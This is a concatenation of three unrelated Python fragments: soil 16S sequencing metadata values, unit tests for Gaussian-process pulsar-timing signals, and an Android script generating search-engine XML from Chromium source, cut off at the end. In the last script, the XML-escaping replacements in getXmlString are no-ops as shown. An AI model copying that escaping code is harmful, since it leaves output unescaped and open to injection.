'PCR primers contain sequencer adapter '
'regions.', 27)],
'linkerprimersequence': [('GTGCCAGCMGCCGCGGTAA', 27)],
'longitude': [
('2.35063674718', 1),
('3.48274264219', 1),
('6.66444220187', 1),
('15.6526750776', 1),
('26.8138925876', 1),
('27.3592668624', 1),
('31.2003474585', 1),
('31.6056761814', 1),
('32.5563076447', 1),
('34.8360987059', 1),
('42.838497795', 1),
('63.5115213108', 1),
('65.3283470202', 1),
('66.1920014699', 1),
('66.8954849864', 1),
('68.5041623253', 1),
('68.5945325743', 1),
('70.784770579', 1),
('74.423907894', 1),
('74.7123248382', 1),
('82.1270418227', 1),
('82.8516734159', 1),
('84.9722975792', 1),
('86.3615778099', 1),
('92.5274472082', 1),
('95.5088566087', 1),
('96.0693176066', 1)],
'pcr_primers': [('FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 27)],
'ph': [('6.8', 9), ('6.82', 10), ('6.94', 8)],
'physical_specimen_location': [('ANL', 27)],
'physical_specimen_remaining': [('True', 27)],
'platform': [('Illumina', 27)],
'required_sample_info_status': [('completed', 27)],
'run_center': [('ANL', 27)],
'run_date': [('8/1/12', 27)],
'run_prefix': [('s_G1_L001_sequences', 27)],
'samp_salinity': [('7.1', 9), ('7.15', 9), ('7.44', 9)],
'samp_size': [('.25,g', 27)],
'sample_center': [('ANL', 27)],
'sample_type': [('ENVO:soil', 27)],
'season_environment': [('winter', 27)],
'sequencing_meth': [('Sequencing by synthesis', 27)],
'study_center': [('CCME', 27)],
'target_gene': [('16S rRNA', 27)],
'target_subfragment': [('V4', 27)],
'taxon_id': [('410658', 9), ('939928', 9), ('1118232', 9)],
'temp': [('15.0', 27)],
'texture': [('63.1 sand, 17.7 silt, 19.2 clay', 9),
('64.6 sand, 17.6 silt, 17.8 clay', 9),
('66 sand, 16.3 silt, 17.7 clay', 9)],
'tot_nitro': [('1.3', 9), ('1.41', 9), ('1.51', 9)],
'tot_org_carb': [('3.31', 9), ('4.32', 9), ('5.0', 9)],
'water_content_soil': [('0.101', 9), ('0.164', 9), ('0.178', 9)]}
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_gp_signals
----------------------------------
Tests for GP signal modules.
"""
import unittest
import numpy as np
import scipy.linalg as sl
from enterprise.pulsar import Pulsar
from enterprise.signals import gp_signals, parameter, selections, signal_base, utils
from enterprise.signals.selections import Selection
from tests.enterprise_test_data import datadir
@signal_base.function
def create_quant_matrix(toas, dt=1):
U, _ = utils.create_quantization_matrix(toas, dt=dt, nmin=1)
avetoas = np.array([toas[idx.astype(bool)].mean() for idx in U.T])
# return value slightly different than 1 to get around ECORR columns
return U * 1.0000001, avetoas
@signal_base.function
def se_kernel(etoas, log10_sigma=-7, log10_lam=np.log10(30 * 86400)):
tm = np.abs(etoas[None, :] - etoas[:, None])
d = np.eye(tm.shape[0]) * 10 ** (2 * (log10_sigma - 1.5))
return 10 ** (2 * log10_sigma) * np.exp(-(tm ** 2) / 2 / 10 ** (2 * log10_lam)) + d
class TestGPSignals(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Setup the Pulsar object."""
# initialize Pulsar class
cls.psr = Pulsar(datadir + "/B1855+09_NANOGrav_9yv1.gls.par", datadir + "/B1855+09_NANOGrav_9yv1.tim")
def test_ecorr(self):
"""Test that ecorr signal returns correct values."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr)
ecm = ec(self.psr)
# parameters
ecorr = -6.4
params = {"B1855+09_basis_ecorr_log10_ecorr": ecorr}
# basis matrix test
U = utils.create_quantization_matrix(self.psr.toas)[0]
msg = "U matrix incorrect for Basis Ecorr signal."
assert np.allclose(U, ecm.get_basis(params)), msg
# Jvec test
jvec = 10 ** (2 * ecorr) * np.ones(U.shape[1])
msg = "Prior vector incorrect for Basis Ecorr signal."
assert np.all(ecm.get_phi(params) == jvec), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Basis Ecorr signal."
assert np.all(ecm.get_phiinv(params) == 1 / jvec), msg
# test shape
msg = "U matrix shape incorrect"
assert ecm.get_basis(params).shape == U.shape, msg
def test_ecorr_backend(self):
"""Test that ecorr-backend signal returns correct values."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
selection = Selection(selections.by_backend)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr, selection=selection)
ecm = ec(self.psr)
# parameters
ecorrs = [-6.1, -6.2, -6.3, -6.4]
params = {
"B1855+09_basis_ecorr_430_ASP_log10_ecorr": ecorrs[0],
"B1855+09_basis_ecorr_430_PUPPI_log10_ecorr": ecorrs[1],
"B1855+09_basis_ecorr_L-wide_ASP_log10_ecorr": ecorrs[2],
"B1855+09_basis_ecorr_L-wide_PUPPI_log10_ecorr": ecorrs[3],
}
# get the basis
bflags = self.psr.backend_flags
Umats = []
for flag in np.unique(bflags):
mask = bflags == flag
Umats.append(utils.create_quantization_matrix(self.psr.toas[mask])[0])
nepoch = sum(U.shape[1] for U in Umats)
U = np.zeros((len(self.psr.toas), nepoch))
jvec = np.zeros(nepoch)
netot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Umats[ct].shape[1]
U[mask, netot : nn + netot] = Umats[ct]
jvec[netot : nn + netot] = 10 ** (2 * ecorrs[ct])
netot += nn
# basis matrix test
msg = "U matrix incorrect for Basis Ecorr-backend signal."
assert np.allclose(U, ecm.get_basis(params)), msg
# Jvec test
msg = "Prior vector incorrect for Basis Ecorr backend signal."
assert np.all(ecm.get_phi(params) == jvec), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Basis Ecorr backend signal."
assert np.all(ecm.get_phiinv(params) == 1 / jvec), msg
# test shape
msg = "U matrix shape incorrect"
assert ecm.get_basis(params).shape == U.shape, msg
def test_kernel(self):
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, name="se")
sem = se(self.psr)
# parameters
log10_lam, log10_sigma = 7.4, -6.4
params = {"B1855+09_se_log10_lam": log10_lam, "B1855+09_se_log10_sigma": log10_sigma}
# basis check
U, avetoas = create_quant_matrix(self.psr.toas, dt=7 * 86400)
msg = "Kernel Basis incorrect"
assert np.allclose(U, sem.get_basis(params)), msg
# kernel test
K = se_kernel(avetoas, log10_lam=log10_lam, log10_sigma=log10_sigma)
msg = "Kernel incorrect"
assert np.allclose(K, sem.get_phi(params)), msg
# inverse kernel test
Kinv = np.linalg.inv(K)
msg = "Kernel inverse incorrect"
assert np.allclose(Kinv, sem.get_phiinv(params)), msg
def test_kernel_backend(self):
# set up signal parameter
selection = Selection(selections.by_backend)
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, selection=selection, name="se")
sem = se(self.psr)
# parameters
log10_sigmas = [-7, -6, -6.4, -8.5]
log10_lams = [8.3, 7.4, 6.8, 5.6]
params = {
"B1855+09_se_430_ASP_log10_lam": log10_lams[0],
"B1855+09_se_430_ASP_log10_sigma": log10_sigmas[0],
"B1855+09_se_430_PUPPI_log10_lam": log10_lams[1],
"B1855+09_se_430_PUPPI_log10_sigma": log10_sigmas[1],
"B1855+09_se_L-wide_ASP_log10_lam": log10_lams[2],
"B1855+09_se_L-wide_ASP_log10_sigma": log10_sigmas[2],
"B1855+09_se_L-wide_PUPPI_log10_lam": log10_lams[3],
"B1855+09_se_L-wide_PUPPI_log10_sigma": log10_sigmas[3],
}
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
U, avetoas = create_quant_matrix(self.psr.toas[mask], dt=7 * 86400)
Fmats.append(U)
fs.append(avetoas)
phis.append(se_kernel(avetoas, log10_sigma=log10_sigmas[ct], log10_lam=log10_lams[ct]))
nf = sum(F.shape[1] for F in Fmats)
U = np.zeros((len(self.psr.toas), nf))
K = sl.block_diag(*phis)
Kinv = np.linalg.inv(K)
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
U[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
msg = "Kernel basis incorrect for backend signal."
assert np.allclose(U, sem.get_basis(params)), msg
# spectrum test
msg = "Kernel incorrect for backend signal."
assert np.allclose(sem.get_phi(params), K), msg
# inverse spectrum test
msg = "Kernel inverse incorrect for backend signal."
assert np.allclose(sem.get_phiinv(params), Kinv), msg
def test_fourier_red_noise(self):
"""Test that red noise signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30)
rnm = rn(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
# basis matrix test
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_noise_pshift(self):
"""Test that red noise signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30, pshift=True, pseed=42)
rnm = rn(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
# basis matrix test
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30, pshift=True, pseed=42)
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_user_freq_array(self):
"""Test that red noise signal returns correct values with user defined
frequency array."""
# set parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
# set up signal model. use list of frequencies to make basis
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, modes=f2[::2])
rnm = rn(self.psr)
# basis matrix test
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_noise_backend(self):
"""Test that red noise-backend signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
selection = Selection(selections.by_backend)
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30, selection=selection)
rnm = rn(self.psr)
# parameters
log10_As = [-14, -14.4, -15, -14.8]
gammas = [2.3, 4.4, 1.8, 5.6]
params = {
"B1855+09_red_noise_430_ASP_gamma": gammas[0],
"B1855+09_red_noise_430_PUPPI_gamma": gammas[1],
"B1855+09_red_noise_L-wide_ASP_gamma": gammas[2],
"B1855+09_red_noise_L-wide_PUPPI_gamma": gammas[3],
"B1855+09_red_noise_430_ASP_log10_A": log10_As[0],
"B1855+09_red_noise_430_PUPPI_log10_A": log10_As[1],
"B1855+09_red_noise_L-wide_ASP_log10_A": log10_As[2],
"B1855+09_red_noise_L-wide_PUPPI_log10_A": log10_As[3],
}
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
F, f = utils.createfourierdesignmatrix_red(self.psr.toas[mask], 30)
Fmats.append(F)
fs.append(f)
phis.append(utils.powerlaw(f, log10_As[ct], gammas[ct]))
nf = sum(F.shape[1] for F in Fmats)
F = np.zeros((len(self.psr.toas), nf))
phi = np.hstack([p for p in phis])
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
F[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
msg = "F matrix incorrect for GP Fourier backend signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
msg = "Spectrum incorrect for GP Fourier backend signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier backend signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_red_noise_add(self):
"""Test that red noise addition only returns independent columns."""
# set up signals
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
cpl = utils.powerlaw(
log10_A=parameter.Uniform(-18, -12)("log10_Agw"), gamma=parameter.Uniform(1, 7)("gamma_gw")
)
# parameters
log10_A, gamma = -14.5, 4.33
log10_Ac, gammac = -15.5, 1.33
params = {
"B1855+09_red_noise_log10_A": log10_A,
"B1855+09_red_noise_gamma": gamma,
"log10_Agw": log10_Ac,
"gamma_gw": gammac,
}
Tmax = self.psr.toas.max() - self.psr.toas.min()
tpars = [
(30, 20, Tmax, Tmax),
(20, 30, Tmax, Tmax),
(30, 30, Tmax, Tmax),
(30, 20, Tmax, 1.123 * Tmax),
(20, 30, Tmax, 1.123 * Tmax),
(30, 30, 1.123 * Tmax, Tmax),
]
for (nf1, nf2, T1, T2) in tpars:
rn = gp_signals.FourierBasisGP(spectrum=pl, components=nf1, Tspan=T1)
crn = gp_signals.FourierBasisGP(spectrum=cpl, components=nf2, Tspan=T2)
s = rn + crn
rnm = s(self.psr)
# set up frequencies
F1, f1 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=nf1, Tspan=T1)
F2, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=nf2, Tspan=T2)
# test power spectrum
p1 = utils.powerlaw(f1, log10_A, gamma)
p2 = utils.powerlaw(f2, log10_Ac, gammac)
if T1 == T2:
nf = max(2 * nf1, 2 * nf2)
phi = np.zeros(nf)
F = F1 if nf1 > nf2 else F2
phi[: 2 * nf1] = p1
phi[: 2 * nf2] += p2
F[
:,
] # noqa: E231
else:
phi = np.concatenate((p1, p2))
F = np.hstack((F1, F2))
msg = "Combined red noise PSD incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phi(params) == phi), msg
msg = "Combined red noise PSD inverse incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
msg = "Combined red noise Fmat incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.allclose(F, rnm.get_basis(params)), msg
def test_red_noise_add_backend(self):
"""Test that red noise with backend addition only returns
independent columns."""
# set up signals
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
selection = Selection(selections.by_backend)
cpl = utils.powerlaw(
log10_A=parameter.Uniform(-18, -12)("log10_Agw"), gamma=parameter.Uniform(1, 7)("gamma_gw")
)
# parameters
log10_As = [-14, -14.4, -15, -14.8]
gammas = [2.3, 4.4, 1.8, 5.6]
log10_Ac, gammac = -15.5, 1.33
params = {
"B1855+09_red_noise_430_ASP_gamma": gammas[0],
"B1855+09_red_noise_430_PUPPI_gamma": gammas[1],
"B1855+09_red_noise_L-wide_ASP_gamma": gammas[2],
"B1855+09_red_noise_L-wide_PUPPI_gamma": gammas[3],
"B1855+09_red_noise_430_ASP_log10_A": log10_As[0],
"B1855+09_red_noise_430_PUPPI_log10_A": log10_As[1],
"B1855+09_red_noise_L-wide_ASP_log10_A": log10_As[2],
"B1855+09_red_noise_L-wide_PUPPI_log10_A": log10_As[3],
"log10_Agw": log10_Ac,
"gamma_gw": gammac,
}
Tmax = self.psr.toas.max() - self.psr.toas.min()
tpars = [
(30, 20, Tmax, Tmax),
(20, 30, Tmax, Tmax),
(30, 30, Tmax, Tmax),
(30, 20, Tmax, 1.123 * Tmax),
(20, 30, Tmax, 1.123 * Tmax),
(30, 30, 1.123 * Tmax, Tmax),
(30, 20, None, Tmax),
]
for (nf1, nf2, T1, T2) in tpars:
rn = gp_signals.FourierBasisGP(spectrum=pl, components=nf1, Tspan=T1, selection=selection)
crn = gp_signals.FourierBasisGP(spectrum=cpl, components=nf2, Tspan=T2)
s = rn + crn
rnm = s(self.psr)
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
F2, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nf2, Tspan=T2)
p2 = utils.powerlaw(f2, log10_Ac, gammac)
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
F1, f1 = utils.createfourierdesignmatrix_red(self.psr.toas[mask], nf1, Tspan=T1)
Fmats.append(F1)
fs.append(f1)
phis.append(utils.powerlaw(f1, log10_As[ct], gammas[ct]))
Fmats.append(F2)
phis.append(p2)
nf = sum(F.shape[1] for F in Fmats)
F = np.zeros((len(self.psr.toas), nf))
phi = np.hstack([p for p in phis])
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
F[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
F[:, -2 * nf2 :] = F2
msg = "Combined red noise PSD incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phi(params) == phi), msg
msg = "Combined red noise PSD inverse incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
msg = "Combined red noise Fmat incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.allclose(F, rnm.get_basis(params)), msg
def test_gp_timing_model(self):
"""Test that the timing model signal returns correct values."""
# set up signal parameter
ts = gp_signals.TimingModel()
tm = ts(self.psr)
# basis matrix test
M = self.psr.Mmat.copy()
norm = np.sqrt(np.sum(M ** 2, axis=0))
M /= norm
params = {}
msg = "M matrix incorrect for Timing Model signal."
assert np.allclose(M, tm.get_basis(params)), msg
# Jvec test
phi = np.ones(self.psr.Mmat.shape[1]) * 1e40
msg = "Prior vector incorrect for Timing Model signal."
assert np.all(tm.get_phi(params) == phi), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Timing Model signal."
assert np.all(tm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "M matrix shape incorrect"
assert tm.get_basis(params).shape == self.psr.Mmat.shape, msg
def test_gp_parameter(self):
"""Test GP basis model with parameterized basis."""
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(0, 7))
basis_env = utils.createfourierdesignmatrix_env(
log10_Amp=parameter.Uniform(-10, -5), t0=parameter.Uniform(4.3e9, 5e9), log10_Q=parameter.Uniform(0, 4)
)
basis_red = utils.createfourierdesignmatrix_red()
rn_env = gp_signals.BasisGP(pl, basis_env, name="env")
rn = gp_signals.BasisGP(pl, basis_red)
s = rn_env + rn
m = s(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
log10_A_env, gamma_env = -14.0, 2.5
log10_Amp, log10_Q, t0 = -7.3, np.log10(345), 55000 * 86400
params = {
"B1855+09_log10_A": log10_A,
"B1855+09_gamma": gamma,
"B1855+09_env_log10_A": log10_A_env,
"B1855+09_env_gamma": gamma_env,
"B1855+09_env_log10_Q": log10_Q,
"B1855+09_env_log10_Amp": log10_Amp,
"B1855+09_env_t0": t0,
}
# get basis
Fred, f2_red = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
Fenv, f2_env = utils.createfourierdesignmatrix_env(
self.psr.toas, nmodes=30, log10_Amp=log10_Amp, log10_Q=log10_Q, t0=t0
)
F = np.hstack((Fenv, Fred))
phi_env = utils.powerlaw(f2_env, log10_A=log10_A_env, gamma=gamma_env)
phi_red = utils.powerlaw(f2_red, log10_A=log10_A, gamma=gamma)
phi = np.concatenate((phi_env, phi_red))
# basis matrix test
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, m.get_basis(params)), msg
# spectrum test
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(m.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(m.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert m.get_basis(params).shape == F.shape, msg
def test_combine_signals(self):
"""Test for combining different signals."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr)
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30)
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, name="se")
ts = gp_signals.TimingModel()
s = ec + rn + ts + se
m = s(self.psr)
# parameters
ecorr = -6.4
log10_A, gamma = -14.5, 4.33
log10_lam, log10_sigma = 7.4, -6.4
params = {
"B1855+09_basis_ecorr_log10_ecorr": ecorr,
"B1855+09_red_noise_log10_A": log10_A,
"B1855+09_red_noise_gamma": gamma,
"B1855+09_se_log10_lam": log10_lam,
"B1855+09_se_log10_sigma": log10_sigma,
}
# combined basis matrix
U = utils.create_quantization_matrix(self.psr.toas)[0]
M = self.psr.Mmat.copy()
norm = np.sqrt(np.sum(M ** 2, axis=0))
M /= norm
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
U2, avetoas = create_quant_matrix(self.psr.toas, dt=7 * 86400)
T = np.hstack((U, F, M, U2))
# combined prior vector
jvec = 10 ** (2 * ecorr) * np.ones(U.shape[1])
phim = np.ones(self.psr.Mmat.shape[1]) * 1e40
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
K = se_kernel(avetoas, log10_lam=log10_lam, log10_sigma=log10_sigma)
phivec = np.concatenate((jvec, phi, phim))
phi = sl.block_diag(np.diag(phivec), K)
phiinv = np.linalg.inv(phi)
# basis matrix test
msg = "Basis matrix incorrect for combined signal."
assert np.allclose(T, m.get_basis(params)), msg
# Kernal test
msg = "Prior matrix incorrect for combined signal."
assert np.allclose(m.get_phi(params), phi), msg
# inverse Kernel test
msg = "Prior matrix inverse incorrect for combined signal."
assert np.allclose(m.get_phiinv(params), phiinv), msg
# test shape
msg = "Basis matrix shape incorrect size for combined signal."
assert m.get_basis(params).shape == T.shape, msg
class TestGPSignalsPint(TestGPSignals):
@classmethod
def setUpClass(cls):
"""Setup the Pulsar object."""
# initialize Pulsar class
cls.psr = Pulsar(
datadir + "/B1855+09_NANOGrav_9yv1.gls.par",
datadir + "/B1855+09_NANOGrav_9yv1.tim",
ephem="DE430",
timing_package="pint",
)
|
|
#!/usr/bin/python2.4
#
# Copyright (C) 2010 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Creates the list of search engines
The created list is placed in the res/values-<locale> directory. Also updates
res/values/all_search_engines.xml if required with new data.
Usage: get_search_engines.py
Copyright (C) 2010 The Android Open Source Project
"""
import os
import re
import sys
import urllib
from xml.dom import minidom
# Locales to generate search engine lists for
locales = ["cs-CZ", "da-DK", "de-AT", "de-CH", "de-DE", "el-GR", "en-AU",
"en-GB", "en-IE", "en-NZ", "en-SG", "en-ZA", "es-ES", "fr-BE", "fr-FR",
"it-IT", "ja-JP", "ko-KR", "nb-NO", "nl-BE", "nl-NL", "pl-PL", "pt-PT",
"pt-BR", "ru-RU", "sv-SE", "tr-TR", "zh-CN", "zh-HK", "zh-MO", "zh-TW"]
google_data = ["google", "Google", "google.com",
"http://www.google.com/favicon.ico",
"http://www.google.com/search?ie={inputEncoding}&source=android-browser&q={searchTerms}",
"UTF-8",
"http://www.google.com/complete/search?client=android&q={searchTerms}"]
class SearchEngineManager(object):
"""Manages list of search engines and creates locale specific lists.
The main method useful for the caller is generateListForLocale(), which
creates a locale specific donottranslate-search_engines.xml file.
"""
def __init__(self):
"""Inits SearchEngineManager with relevant search engine data.
The search engine data is downloaded from the Chrome source repository.
"""
self.chrome_data = urllib.urlopen(
'http://src.chromium.org/viewvc/chrome/trunk/src/chrome/'
'browser/search_engines/template_url_prepopulate_data.cc').read()
if self.chrome_data.lower().find('repository not found') != -1:
print 'Unable to get Chrome source data for search engine list.\nExiting.'
sys.exit(2)
self.resdir = os.path.normpath(os.path.join(sys.path[0], '../res'))
self.all_engines = set()
def getXmlString(self, str):
"""Returns an XML-safe string for the given string.
Given a string from the search engine data structure, convert it to a
string suitable to write to our XML data file by stripping away NULLs,
unwanted quotes, wide-string declarations (L"") and replacing C-style
unicode characters with XML equivalents.
"""
str = str.strip()
if str.upper() == 'NULL':
return ''
if str.startswith('L"'):
str = str[2:]
if str.startswith('@') or str.startswith('?'):
str = '\\' + str
str = str.strip('"')
str = str.replace('&', '&').replace('<', '<').replace('>', '>')
str = str.replace('"', '"').replace('\'', ''')
str = re.sub(r'\\x([a-fA-F0-9]{1,4})', r'&#x\1;', str)
return str
def getEngineData(self, name):
"""Returns an array of strings describing the specified search engine.
The returned strings are in the same order as in the Chrome source data file
except that the internal name of the search engine is inserted at the
beginning of the list.
"""
if name == "google":
return google_data
# Find the first occurance of this search engine name in the form
# " <name> =" in the chrome data file.
re_exp = '\s' + name + '\s*='
search_obj = re.search(re_exp, self.chrome_data)
if not search_obj:
print ('Unable to find data for search engine ' + name +
'. Please check the chrome data file for format changes.')
return None
# Extract the struct declaration between the curly braces.
start_pos = self.chrome_data.find('{', search_obj.start()) + 1;
end_pos = self.chrome_data.find('};', start_pos);
engine_data_str = self.chrome_data[start_pos:end_pos]
# Remove c++ style '//' comments at the ends of each line
engine_data_lines = engine_data_str.split('\n')
engine_data_str = ""
for line in engine_data_lines:
start_pos = line.find(' // ')
if start_pos != -1:
line = line[:start_pos]
engine_data_str = engine_data_str + line + '\n'
# Join multiple line strings into a single string.
engine_data_str = re.sub('\"\s+\"', '', engine_data_str)
engine_data_str = re.sub('\"\s+L\"', '', engine_data_str)
engine_data_str = engine_data_str.replace('"L"', '')
engine_data = engine_data_str.split(',')
for i in range(len(engine_data)):
engine_data[i] = self.getXmlString(engine_data[i])
# If the last element was an empty string (due to an extra comma at the
# end), ignore it.
if not engine_data[len(engine_data) - 1]:
engine_data.pop()
engine_data.insert(0, name)
return engine_data
def getSearchEnginesForCountry(self, country):
"""Returns the list of search engine names for the given country.
The data comes from the Chrome data file.
"""
# The Chrome data file has an array defined with the name 'engines_XX'
# where XX = country.
pos = self.chrome_data.find('engines_' + country)
if pos == -1:
print ('Unable to find search engine data for country ' + country + '.')
return
# Extract the text between the curly braces for this array declaration
engines_start = self.chrome_data.find('{', pos) + 1;
engines_end = self.chrome_data.find('}', engines_start);
engines_str = self.chrome_data[engines_start:engines_end]
# Remove embedded /**/ style comments, white spaces, address-of operators
# and the trailing comma if any.
engines_str = re.sub('\/\*.+\*\/', '', engines_str)
engines_str = re.sub('\s+', '', engines_str)
engines_str = engines_str.replace('&','')
engines_str = engines_str.rstrip(',')
# Split the array into it's elements
engines = engines_str.split(',')
return engines
def writeAllEngines(self):
"""Writes all search engines to the all_search_engines.xml file.
"""
all_search_engines_path = os.path.join(self.resdir, 'values/all_search_engines.xml')
text = []
for engine_name in self.all_engines:
engine_data = self.getEngineData(engine_name)
text.append(' <string-array name="%s" translatable="false">\n' % (engine_data[0]))
for i in range(1, 7):
text.append(' <item>%s</item>\n' % (engine_data[i]))
text.append(' </string-array>\n')
print engine_data[1] + " added to all_search_engines.xml"
self.generateXmlFromTemplate(os.path.join(sys.path[0], 'all_search_engines.template.xml'),
all_search_engines_path, text)
def generateDefaultList(self):
self.writeEngineList(os.path.join(self.resdir, 'values'), "default")
